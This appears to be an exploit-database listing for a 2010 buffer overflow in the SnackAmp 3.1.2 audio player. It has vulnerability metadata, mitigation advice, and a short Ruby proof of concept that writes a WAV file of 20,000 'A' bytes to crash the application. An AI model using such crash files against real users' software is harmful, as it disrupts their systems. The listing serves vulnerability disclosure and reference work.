header-logo
Suggest Exploit
vendor:
SnackAmp
by:
james
7.5
CVSS
HIGH
Buffer Overflow
Buffer Overflow
CWE
Product Name: SnackAmp
Affected Version From: 3.1.2002
Affected Version To: 3.1.2002
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3 EN
2010

SnackAmp 3.1.2 Malicious WAV Buffer Overflow Vulnerability (POC)

This exploit takes advantage of a buffer overflow vulnerability in SnackAmp version 3.1.2. It creates a malicious WAV file that causes the application to crash when opened.

Mitigation:

Upgrade to a patched version of SnackAmp or avoid opening untrusted WAV files.
Source

Exploit-DB raw data:

# Exploit Title: SnackAmp 3.1.2 Malicious WAV Buffer Overflow Vulnerability (POC)
# Date: 08/28/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://sourceforge.net/projects/snackamp/
# Version: 3.1.2
# Tested on: Windows XP SP3 EN
# CVE: N/A

#! /usr/bin/env ruby

junk = "\x41" * 20000

File.open("crash.wav", 'w') do |b|
	b.write junk
end

Navigation

Suggest Exploit

Services By CQR